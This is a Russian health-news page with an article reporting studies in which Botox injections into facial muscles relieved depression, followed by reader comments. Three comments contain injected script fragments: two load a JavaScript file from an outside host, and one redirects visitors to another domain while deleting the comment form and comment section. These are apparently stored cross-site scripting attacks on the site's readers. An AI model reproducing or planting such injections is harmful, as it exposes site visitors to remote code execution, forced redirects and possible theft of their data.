Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Морщины приводят к депрес...  >>  Морщины приводят к депрессии! Как нанести двойной удар и по морщинам, и по депрессии?
 
Обратная связь
 

Морщины приводят к депрессии! Как нанести двойной удар и по морщинам, и по депрессии?

Размер шрифта
13 марта 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Еще совсем недавно ботокс был известен только как эффективное средство для избавления от морщин. Однако теперь ему нашли новое применение, оказывается, ботокс может помочь людям в борьбе с депрессией.

Ученые из медицинского центра Ганновера выяснили, что введение ботокса в мышцы лица, отвечающие за проявление эмоций, облегчает симптомы депрессии. «Мы выражаем свои эмоции при помощи мимических мышц, которые, в свою очередь, при напряжении посылают сигналы обратно в мозг. Благодаря этим сигналам эмоции еще больше усиливаются. Введение ботокса позволяет расслабить мышцы и тем самым прервать этот цикл событий», – рассказывает профессор Тиллман Крюгер, ведущий автор исследования. Результаты его работы были представлены на Съезде Американского общества психиатров.

Улучшение настроения при терапии ботоксом наблюдалось у пациентов, которым проводили инъекции в носогубные складки, а также убирали морщины между бровями. Чтобы подтвердить достоверность этих результатов, доктор Аксель Воллмер из клиники в Гамбурге провел свое собственное исследование. Он изучил действие ботокса как препарата для дополнительной терапии депрессивных расстройств. В его эксперименте приняли участие 30 пациентов с диагностированной хронической депрессией, устойчивой к лекарственной терапии. Пациенты были случайным образом разделены на две группы: первой группе вводили ботокс, второй – солевой раствор (плацебо). Через шесть недель после процедуры у пациентов первой группы наблюдалось значительное уменьшение симптомов депрессии – в среднем на 47,1%, в то время как в группе плацебо оно составило всего 9,2%.

Крюгер назвал ботокс «новым, эффективным и экономически выгодным средством для лечения депрессии, которое при этом хорошо переносится пациентами». Сейчас проводятся исследования эффективности ботокса в лечении некоторых других психиатрических заболеваний.

Если вы решили избавиться от морщин с помощью инъекций ботокса, то у вас есть шанс убить сразу двух зайцев – избавиться заодно и от плохого настроения.

Все о женской красоте в нашем специальном проекте «Хочу быть красивой».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:17

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Болезни-близнецы. Депрессия и гипотиреоз   Как не грустить в новом году   Как мы реагируем на стресс   Грустно? Вспомнили что-то плохое? Вот как бороться с плохим настроением!  
01 апреля 2013Сладкие газировки вызывают депрессию 20 июля 2011Антидепрессанты приводят к депрессии
 
22 ноября 2012Ботокс – спасение от депрессии 24 февраля 2012Мигрень повышает риск депрессии у женщин
 

Слайдшоу

1
Вся правда о депрессии
Как справится со стрессом без лекарств?
От чего умер Робин Уильямс?

Тесты

1
Что вы знаете о депрессии?
Есть ли у вас анемия?
Как быстро вы стареете
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.